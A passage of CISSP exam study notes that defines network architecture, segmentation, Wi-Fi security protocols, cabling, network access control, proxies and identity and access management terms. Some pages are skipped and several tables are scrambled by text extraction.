usually measured in miliseconds)
Jitter: variation in time delay between data packets over a network, measured in miliseconds;
inconsistency of latency over time; you want low-latency, low-jitter, high SNR, and high throughput on
your network
4.1.8 Traffic flows (e.g. north-south, east-west)
Traffic patterns (in, through, and out of a datacenter) are crucial considerations when designing network
architecture, because they affect the choice of network topologies, routing protocols, and security
strategies
North/South (north-south) traffic: the flows of data in and out of the datacenter, between the
datacenter and a customer; traffic between clients on the Internet and servers within the datacenter
(northbound), or vice versa (southbound); in SDN terms, data flowing up (northbound) and down
(southbound) the stack of data/control/application planes
East/West (east-west) traffic: the flows data within the datacenter itself, or between interconnected
datacenters; network traffic that is within a data, control, or application plane; within a data center or
between geo dispersed locations; the data flowing leterally between servers, storage systems, and
applications within the datacenter or across datacenters
4.1.9 Physical segmentation (e.g. in-band, out-of-band, air-gapped)
In-band management: managing network devices through the same network that they are used to
transmit user or application data; this is ultimately less secure, because there is no physical segmentation
82 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Out-of-band management: managing network devices using a dedicated network that is separate from
the main network; this is more secure
Air-gapped: extreme form of segmentation where one segment of the network is completely isolated
from all others physically and logically; this is most secure, and is typically used for industrial control
systems (ICS)
Physical segmentation: creating a separate physical network
4.1.10 Logical segmentation (e.g., virtual local area networks (VLANs), virtual private networks (VPNs), virtual
routing and forwarding, virtual domain)s
Virtual Local Area Networks (VLAN): allows a single physical network to be partitioned into multiple
smaller logical netowrks; a virtual LAN is a hardware-imposed network segmentation created by switches
that requires a routing function to support communication between different segments
Virtual Private Network (VPN): creates a private network across public network infrastructure; used to
connect remote users or separate branches of a business to the main office's network; a traditional
remote access technology; VPNs are based on encrypted tunneling; they offer authentication and data
protection as a point-to-point solution
most common VPN protocols: PPTP, L2TP, SSH, TLS, and IPsec
split tunnel: a VPN configuration that allows a VPN-connected client system (e.g. remote node) to
access both the org network via the VPN and the internet directly at the same time
full tunnel: a VPN configuration in which all the client's traffic is sent to the org network over the
VPN link, and any internet-bound traffic is routed out of the org network's proxy or firewall interface
Virtual Routing & Forwarding (VRF): allows mutliple instances of a routing table to co-exist within the
same router, at the same time; allowing one physical router to emulate multiple virtual routers
Virtual domain: ability to create multiple separate security domains within a single physical device (e.g. a
firewall); allows multiple virtual firewall instances within a single device; provides creating logical
segmentation at the virtual machine level
4.1.11 Micro-segmentation (e.g., network overlays/encapsulation; distributed firewalls, routers, intrusion
detection system (IDS)/intrusion prevention system (IPS), zero trust)
Micro-segmentation: enhances security by minimizing the lateral movement of attackers within a
network, effectively creating a segmented, or compartmentalized architecture where each segment may
have its own security policies and controls
Network overlays/encapsulation: creation of a virtual network that is abstracted or 'overlaid' on top of
the physical network; can be done via SDN
Distributed firewalls: rather than routing traffic through a central firewall, security policies are enforced
at the virtual network interface level for each virtual machine (VM) or container; essentially distributing
virtual firewall rules and building small virtual firewalls, allowing us to achieve micro-segmation
Distrbuted routers: similar to distributed firewalls, distributed routers operate at the workload-level to
control the flow of traffic between segments
IDS/IPS: deployed strategically within the network to monitor and protect individual workloads or network
segments rather than just at the perimeter
Zero Trust: you can achieve the 'trust nothing, verify everything' nature of ZT by using micro-
segmentation; each micro-segment is treated as its own secure zone, and acccess to each zone is given
only after the identity and context of the request have been thoroughly verified
4.1.12 Edge networks (e.g., ingress/egress, peering)
Edge networks: broader term where networks that are situated at the edge of a centralized network,
closer to the end-users to reduce latecy; designed to deliver content and services with reduced latency
and increased performance by being located geographically closer to the user; a CDN, where the goal is
to get content as physically close to the user as possible, is an example of a edge network
83 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Ingress: traffic entering a network; typically created by users accessing services hosted at the edge
Egress: traffic exiting a network; usually refers to data sent from services at the edge, back to users, or to
another network
Peering: directly interconnecting separate networks for the purpose of exchanging traffic, instead of
routing traffic through the Internet; many Internet service providers have peering arangements between
providers
4.1.13 Wireless networks (e.g. Bluetooth, Wi-Fi, Zigbee, satellite)
Narrowband: refers to a communication channel or system that operates with a small bandwidth,
meaning it uses a limited range of frequencies to transmit data; in contrast to broadband, which can carry
large amounts of data over a wide frequency range, narrowband systems focus on efficient transmission
of smaller amounts of data, often over long distances, by using lower data rates and narrower frequency
bands
Light Fidelity (Li-Fi): a form of wireless communication technology that relies on light to transmit data,
with theorectical speeds up to 224Gbits/sec
Radio Frequency Identification (RFID): a technology used to identify and track objects or individuals
using radio waves, with two main components: an RFID tag (or transponder) and an RFID reader; the tag
contains a small microchip and an antenna, and the reader emits a signal that communicates with the tag
to retrieve the stored information
Passive Tags don't have their own power source, relying instead on the energy from the RFID
reader's signal to transmit data
Active Tags have a battery and can broadcast signals over longer distances
Near Field Communicatio (NFC): a wireless communication technology that allows devices to exchange
data over short distances, usually within a range of about 4 centimeters (1.5 inches); it operates on the
same principle as RFID but is designed for closer proximity communication and is commonly used in
mobile devices for tasks like contactless payments and data sharing; unlike RFID, where only the reader
actively sends signals, NFC enables two-way communication
Active Mode: both devices generate their own radio frequency signals to communicate
Passive Mode: one device (like an NFC tag) is passive and only transmits data when powered by
the active device's signal, similar to how passive RFID tags work
Bluetooth: wireless personal area network, IEEE 802.15; an open standard for short-range RF
communication used primarily with wireless personal area networks (WPANs); secure guidelines:
use Bluetooth only for non-confidential activities
change default PIN
turn off discovery mode
turn off Bluetooth when not in active use
Wi-Fi: Wireless LAN IEEE 802.11x; associated with computer networking, Wi-Fi uses 802.11x spec to
create a public or private wireless LAN
Wired Equivalent Privacy (WEP):
WEP is defined by the original IEEE 802.11 standard
WEP uses a predefined shared Rivest Cipher 4 (RC4) secret key for both authentication
(SKA) and encryption
Shared key is static
WEP is weak from RC4 implementation flaws (short, static IV sent in cleartext, IV is part of
encryption key, and no integrity protection)
Wi-Fi Protected Access (WPA): a security standard for wireless network computing devices;
developed by the Wi-Fi Alliance to provide better data encryption and user authentication than
WEP, which was the original Wi-Fi security standard
84 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Temporal Key Integrity Protocol (TKIP): an encryption protocol that was part of the WPA
protocol; TKIP was designed to replace the insecure WEP encryption protocol,TKIP is no
longer considered secure and has been deprecated
Wi-Fi Protected Access II (WPA2):
IEEE 802.11i WPA2 replaced WEP and WPA
Uses AES-CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code
Protocol)
WPA2 operates in two modes, personal and enterprise
personal mode or the Pre-Shared Key (PSK) relies on a shared passcode or key known
to both the access point and the client device; typically used for home network
security
enterprise mode uses the more advanced Extensible Authentication Protocol (EAP)
and an authentication server and individual credentials for each user or device;
enterprise mode is best suited to companies and businesses
Wi-Fi Protected Access 3 (WPA3):
WPA3-ENT uses 192-bit AES CCMP encryption
WPA3-PER remains at 128-bit AES CCMP
WPA3 simultaneous authentication of equals (SAE): improves on WPA2's PSK mode by
allowing for secure authentication between clients and the wireless network without
enterprise user accounts; SAE performs a zero-knowledge proof process known as
Dragonfly Key Exchange (which is a derivative of Diffie-Hellman); SAE uses a preset
password and the MAC addresses of the client and AP to perform authentication and session
key exchange
802.1X / EAP
IEEE 802.1X defines the use of encapsulated EAP to support a wide range of authentication
options for LAN connections; the 802.1x standard is named "Port-Based Network Access
Control"
802.1X is a mechanism to proxy authentication from the local device to a different dedicated
auth service within the network
WPA, WPA2, and WPA3 support the enterprise (ENT) authentication known as 802.1X/EAP
(requires user accounts)
Extensible Authentication Protocol (EAP) is not a specific mechanism of authentication,
rather an authentication framework
802.1X/EAP is a standard port-based network access control that ensures that clients cannot
communicate with a resource until proper authentication has taken place
Through the use of 802.1X Remote Authentication Dial-In User Service (RADIUS), Terminal
Access Control Access Control System (TACACS), certificates, smartcards, token devices
and biometrics can be integrated into wireless networks
Donʼt forget about ports related to common AAA services:
UDP 1812 for RADIUS
TCP 49 for TACACS+
Service Set Identifier (SSID): the name of a wireless network that is broadcast by a Wi-Fi router
or access point, and used to uniquely identify a wireless network, so devices can recognize and
connect to it; when you search for Wi-Fi networks on your phone or computer, the list of available
networks you see consists of their SSIDs
85 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Extended Service Set Identifier (ESSID): the name of a wireless network (Wi-Fi network)
that users see when they search for available networks, identifying the extended service set,
which is essentially a group of one or more access points (APs) that form a wireless network;
multiple APs in the same network can share the same ESSID, allowing seamless roaming for
users within the network coverage area
Basic Service Set Identifier (BSSID): a unique identifier for each AP in a Wi-Fi network; itʼs
the MAC address of the individual wireless access point or router within the network; while
multiple APs in a network can share the same ESSID, each AP will have its own unique BSSID
to distinguish it from other APs
Site survey: a formal assessment of wireless signal strength, quality, and interference using an RF
signal detector
Wi-Fi Protected Setup (WPS): intended to simplify the effort of setting up/adding new clients to a
secured wireless network; operates by automatically connecting the first new wireless client to
seek the network once WPS is triggered
WPS allows users to easily connect devices to a Wi-Fi network by:
pressing a physical WPS button on the router
entering an 8-digit PIN found on the router
using NFC or Push-Button Connect for quick device pairing
the 8-digit PIN method is vulnerable to attacks, particularly brute-force, due to the
structure of the WPS protocol, since the PIN is validated in two halves; also many
routers do not implement rate limiting allowing repeated PIN attempts without lock out
Best WPS protection is to turn it off
Lightweight Extensible Authentication Protocol (LEAP) is a Cisco proprietary alternative to TKIP for
WPA
Avoid using LEAP, use EAP-TLS as an alternative; if LEAP must be used a complex password
is recommended
Protected Extensible Authentication Protocol (PEAP): a security protocol used to better secure
WiFi networks; PEAP is protected EAP, and it comes with enhanced security protections by
providing encryption for EAP methods, and can also provide authentication; PEAP encapsulates
EAP within an encrypted TLS (Transport Layer Security) tunnel, thus encrypting any EAP traffic that
is being sent across a network
EAP Methods
Method Type Auth Creds When to Use
EAP- Non- Challenge/response Passwords for Avoid
MD5 Tunnel with hashing client auth
EAP- Non- Challenge/response Passwords for Avoid
MSCHAP Tunnel with hashing client auth
Challenge/response Digital
EAP-TLS Non- with public
Tunnel cryptography key certificates for To support digitial certs
client/server as client/server creds
auth
EAP- Non- Cleartext pass Passwords/OTP Only use inside PEAP or
GTC Tunnel for client auth EAP-FAST
86 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
services over WAN links; put another way, SDN-WAN is an extension of SDN practices to connect entities
spread across the internet, supporing WAN architecture; espcially related to cloud migration
SDWANs are commonly used to manage multiple ISP, and other connectivity options for speed,
reliability, and bandwidth design goals
Software-defined Visibility (SDV): a framework to automate the processes of network monitoring and
response; the goal is to enable the analysis of every packet and make deep intelligence-based decisions
on forwarding, dropping, or otherwise responding to threats
4.1.17 Virtual Private Cloud (VPC)
Virtual Private Cloud (VPC): provides a logically isolated and customizable portion of a public cloud
provider's infrastructure to a customer; a private cloud environment that's hosted within a public
cloud; VPCs allow orgs to create a virtual network that is isolated from other users of the public cloud
4.1.18 Monitoring and management (e.g., network observability, traffic flow/shaping, capacity management, fault
detection and handling)
Monitoring and management: tools, practices, and processes aimed at ensuring the availability,
performance, and reliability of computer networks, systems, and services; monitoring and management
includes performance and security monitoring, configuration management, log management, alerting and
notification, reporting and analytics etc.
Network observability: ability to gain insights into the functionality of the network
Traffic flow/shaping: means controlling the movement of packets within a network to optimize
performance, prioritize critical traffic, and enforce policies; for instance prioriting protocols/traffic like
VoIP
Capacity management: monitoring and planning network resources to ensure they meet current and
future demand; this is becoming less important as more organizations move to the cloud (which provides
resources on-demand)
Fault-detection and handling: appropriately handling issues by identifying and diagnosing problems
using methods like automatic remediation, manual intervention, IR etc
4.2 Secure network components (OSG-10 Chpt 11)
The components of a network make up the backbone of the logical infrastructure for an organization; these
components are often critical to day-to-day operations, and an outage or security issue can be very costly
4.2.1 Operation of hardware (e.g. redundant power, warranty, support)
Modems provide modulation/demodulation of binary data into analog signals for transmission; modems
are a type of Channel Service Unit/Data Service Unit (CSU/DSU) typically used for converting analog
signals into digital; the CSU handles communication to the provider network, the DSU handles
communication with the internal digital equipment (in most cases, a router)
modems typically operate at Layer 2
routers operate at Layer 3, and make the connection from a modem available to multiple devices in
a network, including switches, access points and endpoint devices
switches are typically connected to a router to enable multiple devices to use the connection
switches help provide internal connectivity, as well as create separate broadcast domains when
configured with VLANs
switches typically operate at Layer 2 of the OSI model, but many switches can operate at both
Layer 2 and Layer 3
access points can be configured in the network topology to provide wireless access using one of
the protocols and encryption algorithms
90 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Redundant power: most home equipment use a single power supply, if that supply fails, the device loses
power
redundant power is typically used with components such as servers, routers, and firewalls
redundant power is usually paired with other types of redundancies to provide high availability
4.2.2 Transmission media (e.g., physical security of media, signal propagation quality)
Transmission Media: comes in many forms, not just cables
includes wireless, LiFi, Bluetooth, Zigbee, satellites
most common cause of network failure (i.e. violations of availability) are cable failures or
misconfigurations
wired transmission media can typically be described in three categories: coaxial, Ethernet, fiber
coaxial is typically used with cable modem installations to provide connectivity to an ISP, and
requires a modem to convert the analog signals to digital
ethernet can be used to describe many mediums, it is typically associated with Category 5/6
unshielded twisted-pair (UTP) or shielded twisted pair (STP), and can be plenum-rated
Key Points for Each Cable Type:
STP (Shielded Twisted Pair): features shielding around the pairs of wires to reduce
electromagnetic interference (EMI);commonly used in industrial settings or environments
with high interference
UTP (Unshielded Twisted Pair): the most commonly used cable type for Ethernet (Cat5e,
Cat6, etc.); more susceptible to EMI than STP, but cheaper and easier to install
10Base2 Coax (Thinnet): used to connect systems to backbond trunks of thicknet cabling
(185m, 10Mbps); an older coaxial cable type used for Ethernet networks, now mostly
obsolete; requires terminators at each end of the cable to prevent signal loss
10Base5 Coax (Thicknet): can span 500 meters and provide up to 10Mbps; early Ethernet
cabling standard, thick and heavy, now obsolete; provided long-distance connectivity but
was difficult to install and maintain
100BaseT (Fast Ethernet): supports speeds up to 100 Mbps, used in early LANs, and still
used in some legacy systems
1000BaseT (Gigabit Ethernet): uses UTP or STP cables (usually Cat5e or Cat6) for Gigabit
Ethernet; widely deployed in modern office and home networks
Fiber Optic: uses light for data transmission, making it immune to EMI and capable of very
high speeds and long distances; most often used in the datacenter for backend components;
two main types: Single-mode (for long distances, e.g., up to 40 km) and Multimode (for
shorter distances, e.g., up to 2 km); more expensive than copper-based cables but
necessary for high-speed, long-distance communication
Cabling Type Shielding Max Max
Speed Distance Cost Common
Use
Installation
Complexity
Shielded 10 Up to 100 Higher Industrial and
More
STP (Shielded (protects Mbps meters for than UTP high- complex,
Twisted Pair) against - 10 higher due to interferencedue to
interference) Gbps speeds shielding environmentsshielding
Unshielded 10 Up to 100 Lower Office LANs, Easy,
UTP (Unshielded (less Mbps meters for cost, very home lightweight,
Twisted Pair) interference - 10 higher common networks flexible to
protection) Gbps speeds install
91 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
92 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Category Frequency
Range
Max Data
Rate
Typical
Application
Max
Distance Description
Widely used for Fast
Cat 5 100 MHz 100 Mbps Fast Ethernet 100 meters Ethernet networks; no
(100Base-T) longer recommended for
new installs.
Enhanced Cat 5 with
Cat 5e 100 MHz 1 Gbps Gigabit 100 meters reduced crosstalk;
Ethernet standard for most
Gigabit Ethernet today.
1 Gbps (up Gigabit 100 meters More robust against
to 10 Gbps Ethernet, for 1 Gbps, interference; supports
Cat 6 250 MHz for short 10GBase-T 55 meters 10 Gbps at limited
distances) (short for 10 Gbps distances.
distances)
10GBase-T Enhanced Cat 6;
Cat 6a 500 MHz 10 Gbps Ethernet 100 meters supports 10 Gbps at full
100-meter distances.
Shielded cables;
High-speed supports higher
Cat 7 600 MHz 10 Gbps networking, 100 meters frequencies with
data centers improved noise
resistance.
Data centers, Designed for short-
Cat 8 2000 MHz 25 Gbps to high- distance data center
(2 GHz) 40 Gbps performance 30 meters applications; shielded for
computing minimal noise.
4.2.3 Network Access Control (NAC) systems (e.g., physical, and virtual solutions)
Network Access Control (NAC): the concept of controlling access to an environment through strict
adherence to and enforcement of security policy
NAC is meant to be an automated detection and response system that can react in real time, ensuring all
monitored systems are patched/updated and have current security configurations, as well as keep
unauthorized devices out of the network
NAC goals:
prevent/reduce known attacks directly (and zero-day indirectly)
enforce security policy throughout the network
use identities to perform access control
NAC can be implemented with a preadmission or postadmission philosophy:
preadmission philosohpy: requires a system to meet all current security requirements (such as
patch application and malware scanner updates) before it is allowed to communicate with the
network
postadmission philosophy: allows and denies access based on user activity, which is based on a
predefined authorization matrix
93 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Agent-based NAC:
installed on each management system, checks config files regularly, and can quarantine for non-
compliance
dissolvable: usually written in a web/mobile language and is executed on each local machine when
the specific management web page is accessed (such as captive portal)
permanent: installed on the monitored system as a persistent background service
Agentless NAC: no software is installed on the endpoint, instead, the NAC system performs security
checks using existing network infrastructure, such as switches, routers, firewalls, and network protocols;
it gathers information about the device passively or actively through scans, without requiring direct
interaction with the endpoint
NAC posture assessment capability determines if a system is sufficiently secure and compliant to
connect to the network; this is a form of risk-based access control
Feature Agent-Based NAC Agentless NAC
Software Requires agent installation on devices No software installation
Requirement required on devices
Depth of Provides deep insight into device security Provides basic information
Security posture (antivirus, OS, patches) (device type, MAC, OS)
Checks
Continuous Yes, can perform continuous monitoring after Typically performs one-time or
Monitoring network access periodic checks
Device May not support unmanaged devices or IoT Works with all devices (IoT,
Compatibility devices printers, guest devices)
Deployment More complex due to agent installation and Easier to deploy, no software
Complexity management installation required
Granular Offers granular control over security policies Limited control, focuses on
Control basic compliance
Remediation Can help remediate non-compliant devices Limited or no remediation
Capabilities (e.g., installing patches) capabilities
Just as you need to control physical access to equipment and wiring, you need to use logical controls to
protect a network; there are a variety of devices that provide this type of protection, including:
stateful and stateless firewalls can perform inspection of the network packets and use rules,
signatures and patterns to determine whether the packet should be delivered
reasons for dropping a packet could include addresses that donʼt exist on the network, ports
or addresses that are blocked, or the content of the packet (e.g. malicious packets blocked
by admin policy)
IDP devices, which monitor the network for unusual network traffic and MAC or IP address
spoofing, and then either alert on or actively stop this type of traffic
proxy server information:
proxy server: used to mediate between clients and servers, most often in the context of
providing clients on a private network with internet access, while protecting the identify of
the client
94 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
forward proxy: usually used by clients to anonymize their traffic, improve privacy, and cache
data; a forward proxy is configured on client-side devices to manage access to external
resources
reverse proxy: usually positioned in front of servers to distribute incoming traffic, improve
performance through load balancing, and enhance security by hiding the details of backend
servers; reverse proxies are often deployed to a perimeter network; they proxy
communication from the internet to an internal host, such as a web server
transparent proxy: operates without client configuration and intercepts traffic transparently,
often for monitoring or content filtering purposes without altering the clientʼs perception of
the connection
nontransparent proxy: requires explicit configuration on the client side and may modify
traffic to enforce policies, such as restricting access or logging user activities
Attribute Forward Reverse Proxy Transparent Nontransparent
Proxy Proxy Proxy
Acts as an Acts as an Intercepts
Primary intermediary intermediary client requests Requires explicit
Function between between client without client
client and and backend modifying configuration
internet servers them
Client Client is Client is Client is Client is aware
aware of
Awareness proxy usage proxy usage unaware of unaware of
proxy usage of proxy usage
Content Load balancing, Caching,
filtering, security, and content Content filtering,
Use Case privacy, and hiding server filtering security, and
caching for identity without client logging
users configuration
Configured No
on client Configured on configuration Requires
Configuration devices or the server side needed on the configuration on
network client side the client side
settings
Proxy IP Proxy hides Proxy Proxy server IP
address is server IP operation is address is
Visibility visible to the address from invisible to visible to the
target the client both client client
website and server
Can modify Does not
Modification Can modify or server modify Can modify or
of Requests filter client responses or requests or filter client
requests requests from responses requests
clients
95 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
AAL3 (very high confidence): requires hardware-based MFA mandates verifier impersonation and
phishing resistance
Accountability: after authenticating subjects, systems authorize access to objects based on their proven
identity; auditing logs and audit trails record events, including the identity of the subject performing the action;
the combination of effective identification, authentication, and auditing provides accountability; note that the
principle of access control is accountability
The three primary authentication factors are authentication by knowledge (something you know), authentication
by ownership (something you have), and authentication by characteristic (something you are)
Something you know: Type 1 authentication (passwords, pass phrase, PIN etc)
Something you have: Type 2 authentication (ID, passport, smart card, token, cookie on PC etc)
Something you are: Type 3 authentication, includes biometrics (fingerprint, iris or retinal scan, facial
geometry etc.)
Somewhere you are: Type 4 authentication (IP/MAC address)
Something you do: Type 5 authentication (signature, pattern unlock)
Single sign-on (SSO) technologies allow users to authenticate once and access any resources in a network or
the cloud, without authenticating again
Access Control System: ensuring access to assets is authorized and restricted based on business and security
requirements
Access Control Token: based on the parameters like time, date, day etc a token defines access validity to a
system
ADFS: identity access solution that provides client computers (internal or external to your network) with
seamless SSO access to protected Internet-facing applications or services, even when the user accounts and
applications are located in completely different networks or orgs
Asynchronous token (authentication by ownership hard/soft token): involves a challenge and response; they
are more complicated (and expensive), but also more secure (see synchronous token)
Cache poisoning: adding content to cache that wasn't an intended element (of say a web page); once
poisoned, a legit web doc can call on a cached item, activating the malicious cache
Capability tables: list privileges assigned to subjects and identify the objects that subjects can access
CAPTCHA: Completely Automated Public Turing test to tell Computers and Humans Apart is a security measure
used to protect against account creation automation and spam & brute-force password decryption attacks
CAS: Central Authentication Service (an SSO implementation)
Content-dependent control: Content-dependent access control adds additional criteria beyond identification
and authentication: the actual content the subject is attempting to access; all employees of an org may have
access to the HR database to view their accrued sick time and vacation time, but should an employee attempt
to access the content of the CIO's HR record, access is denied
Context-dependent access control: applies additional context before granting access, with time as a
commonly used context
Crossover Error Rate (CER): identifies the accuracy of a biometric method, and is the point at which false
acceptance rate (FAR or Type 2) equals the false rejection rate (FRR or Type 1) for a given sensor, in a given
system and context; it is the optimal point of operation if the potential impacts of both types of errors are
equivalent
Cross-Site Request Forgery (CSRF): (AKA XSRF) an attack that forces authenticated users to submit a
request to a Web application against which they are currently authenticated; in CSRF attack the intended target
is the web app itself; the attack exploits the trust that the web app has in the user's browser, and by tricking the
auth'd user into submitting a forged request, the attacker can cause the web app to perform actions as if it were
initiated by the legit user
FRR: False Rejection Rate (Type 1) is the probability of incorrectly denying authentication to a legit identity and
therefore denying access; expressed as a percentage
FAR: False Acceptance Rate (Type 2) is the probability of incorrectly authenticating a claimed identity as legit,
recognizing and granting access on that basis; expressed as a percentage
99 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
Ethical Wall: the use of administrative, physical/logical controls to establish/enforce separation of information,
assets or job functions for need-to-know boundaries or prevent conflict of interest situations; AKA
compartmentalization
Granularity of controls: level of abstraction or detail which in a security function can be configured or tuned for
performance and sensitivity
IDaaS: cloud-based service that brokers IAM functions to target systems on customers' premise and/or in the
cloud; refers to implementation/integration of identity services in a cloud-based environment; services include
provisioning, administration, SSO, MFA, directory services, on-prem and in the cloud
Identification: the process of a subject claiming, or professing, an identity; subjects claim an identity through
identification
Identity proofing: AKA registration, process of confirming someone is who they claim to be; process of
collecting/verifying info about someone who has requested access/credential/special privilege to establish a
relationship with that person; identity proofing includes knowledge-based authentication and cognitive
passwords, where a user is asked a series of questions that only they would know
Knowledge-based authentication (KBA): process of asking a user a series of questions based on their history
that is recorded in authoritative sources; e.g. a bank asks a customer a series of questions about past
addresses they've lived, and current payment amounts for car/mortgage
Memory card: authentication by ownership factor typically uses a magnetic strip as memory, where the same
data is read from the strip with every transaction
Objects: things a subject accesses, such as files; a user is a subject who accesses objects while performing
some action or accomplishing a task
Passwords authentication: the weakest form of authentication, but password policies help increase security by
enforcing complexity and history requirements
Policy Enforcement Point (PEP): app component that receives auth requests, functioning as a gatekeeper,
sending the reuqest on to the PDP; once a decision is provided by the PDP, the PEP enforces it (grant/deny)
Policy Decision Point (PDP): make decisions on auth requests sent from PEP, based on pre-defined rules
Self-service identity management: elements of the identity management lifecycle which the end-user
(identity in question) can initiate or perform on their own (e.g. password reset, changes to challenge questions
etc)
Server-Side Request Forgery (SSRF): if an API fetches a remote resource without validating the user-supplied
URI, this vuln lets the attacker exploit the application to send a crafted request to an unexpected destination
(regardless of firewall/VPN protection)
SESAME: Secure European System for Applications in a Multi-Vendor Environment an improved version of
Kerberos; a protocol for SSO (like Kerberos), but has the advantage of supporting both symmetric and
asymmetric cryptography (and therefore solves Kerberos' problem of key distro); it also issues multiple tickets
mitigating attacks like TOCTOU
Session: what is created as a result of a successful user identification, authentication, and authorization
process; represents the connection and interaction between a user and a system
Seven Laws of Identity:
1: User control and consent: identity systems should only reveal user-identifying info with the user's
concent
2: Minimal disclosure for a constrained use: the identity system should disclose the least identifying info
possible
3: Justifiable parties: systems should only disclose information to parties that have a justified need
4: Directed identity: highlights the need for both public and private identifiers, giving individuals control of
their identities and how they establish trust
5: Pluralism of operators and technologies: identity systems should interoperate with agreed-upon
protocols and a unified user experience
6: Human integration: businesses should establish very reliable communication between a system and
users and test safeguards regularly
100 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
7: Consistent experience across context: the unifying identity system should guarantee users a simple,
consistent experience, allowing users to decide what identity to use in what context
Smart card: authentication by ownership factor that contains an embedded integrated circuit (IC) chip that
generates unique auth data with every transaction (see memory card)
Split-response attack: attack that causes the client to download content that was not an intended element of a
requested web page, storing it in browser cache
Subject: entities, such as users, that access passive objects
Synchronous token (authentication by ownership hard/soft token): both the token generator and auth server
generate the same token or one-time password every 30-60 seconds (see asynchronous token)
Template: a digital representation of someone's unique biometric features (i.e. a one-way math function
representing biometric data); templates can be used as "1 N" for identification (where user's template is used to
search for the identity of the user) , or "1 1" for authentication (where the user is identified and the template is
used as a factor to authenticate the user)
Whaling attack: phishing attack targeting highly-placed officials/private individuals with sizeable assets
authorizing large-fund wire transfers
XSS: Cross-Site Scripting (XSS) essentially uses reflected input to trick a user's browser into executing
untrusted code from a trusted site; these attacks are a type of injection, in which malicious scripts are injected
into otherwise benign and trusted websites; XSS attacks occur when an attacker uses a web app to send
malicious code, generally in the form of a browser side script, to a different end user; flaws that allow these
attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within
the output it generates without validating or encoding it
XST: Cross-Site Tracing (XST) attack involves the use of Cross-site Scripting (XSS) and the TRACE or TRACK
HTTP methods; this could potentially allow the attacker to steal a user's cookies
5.1 Control physical and logical access to assets (OSG-10 Chpt 13)
Controlling access to assets (assets are anything of value to the organization); tangible assets are things you
can touch, and non-tangible assets are things like info and data; controlling access to assets is a central theme
of security
Understand that there is no security without physical security: admin, technical and logical access controls
aren't effective without control over the physical env
Understand what assets you have, and how to protect them
physical security controls: such as perimeter security and environmental controls
control access and the environment
logical access controls: automated systems that auth or deny access based on verification that identify
presented matches that which was previously approved; technical controls used to protect access to
information, systems, devices, and applications
includes authentication, authorization, and permissions
permissions help ensure only authorized entities can access data
logical controls restrict access to config settings on systems/networks to only authed individuals
applies to on-prem and cloud
In addition to personnel, assets can be information, systems, devices, facilities, applications or services
5.1.1 Information
An orgʼs information includes all of its data, stored in simple files (on servers, computers, and small
devices), or in databases
5.1.2 Systems
101 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
An orgʼs systems include anything that provide one or more services; a web server with a database is a
system; permissions assigned to user and system accounts control system access
5.1.3 Devices
Devices refer to any computing system (e.g. routers & switches, smartphones, laptops, and printers);
BYOD has been increasingly adopted, and the data stored on the devices is still an asset to the org
5.1.4 Facilities
Any physical location, building, rooms, complexes etc; physical security controls are important to help
protect facilities
5.1.5 Applications
Apps provide access to data; permissions are an easy way to restrict logical access to apps
5.1.6 Services
The point of identity management is to control access to any asset including data, systems, and services;
services include a wide range of process functionality such as printing, end-user support, network
capacity etc; as above, access control is important to secure these services
5.2 Design identification and authentication strategy (e.g., people, devices, and
services) (OSG-10 Chpt 13)
Identification: the process of a subject claiming, or professing an identity
Authentication: verifies the subjectʼs identity by verifying an identity through knowledge, ownership, or
characteristic; comparing one or more factors against a database of valid identities, such as user accounts
a core principle with authentication is that all subjects must have unique identities
identification and authentication occur together as a single two-step process
users identify themselves with usernames and authenticate (or prove their identity) with passwords
5.2.1 Groups and Roles
Roles: set of permissions that correspond to a job function within an org, rather than a group of users; a
user is assigned a role, and granted the permissions associated with that role;s
another way of saying this is that roles are function-centric, for instance say a helpdesk analyst,
level-1, is a specific role that defines the specific permission available
roll-based access means that a role with specific permissions is created and then assigned to
someone in that role or job
Groups: a group is a collection of users, and admins can assign permissions to the group instead of
assigning permissions to individual users; this makes it easier to manage larger numbers of users
groups are user-centric, focusing on the collective identity of that group of users
Identity and access management is a collection of processes and technologies that are used to control
access to critical assets; it's purpose is the management of access to information, systems, devices, and
facilities
Identity Management (IdM) implementation techniques generally fall into two categories:
centralized access control: implies a single entity within a system performs all authorization
verification
potentially creates a single point of failure
small team can manage initially, and can scale to more users
102 / 175
2025-CISSP-Domain-Objectives.MD 2025-06-11
decentralized access control: (AKA distributed access control) implies several entities located
throughout a system perform auth verification
requires more individuals or teams to manage, and admin may be spread across numerous
locations
difficult to maintain consistency
changes made to any individual access control point needs to be repeated at others
With ubiquitous mobile computing and anywhere, anytime access (to apps & data), identity is the "new
perimeter"
5.2.2 Authentication, Authorization and Accounting (AAA) (e.g., multi-factor authentication (MFA), password-
less authentication)
The four key access control services: Identification (assertion of identity), Authentication (verification of
identity), Authorization (definition of access), Accountability (responsibility of actions)
Note that AAA is the same principles of Authentication, Authorization, and using the word
Accounting instead of Accountability (but it's the same principle)
and remember that the three factors of authentication that you need to understand is knowledge,
ownership, and characteristic (see above)
Two important security elements in an access control system are authorization and accountability
Authorization: subjects are granted access to objects based on proven identities; the level of
access defined for the identified and authenticated user or process
Accountability AKA Principle of Access Control: proper identification, authentication, and
authorization that is logged and monitored; users and other subjects can be held accountable for
their actions when auditing is implemented; accountability is maintained for individual subjects
through the use of auditing; logs record user activities and users can be held accountable for their
logged actions; this encourages good user behavior and compliance with the org's security policy;
also see definitions/interpolations in Domain 2, and above
Auditing: tracks subjects and records when they access objects, creating an audit trail in one or more
audit logs
Auditing provides accountability
Single-factor authentication: any authentication using only one proof of identity
Two-factor authentication (2FA): requires two different proofs of identity
Multifactor authentication (MFA): any authentication using two or more factors
multifactor auth must use multiple types or factors, such as something you know and something
you have
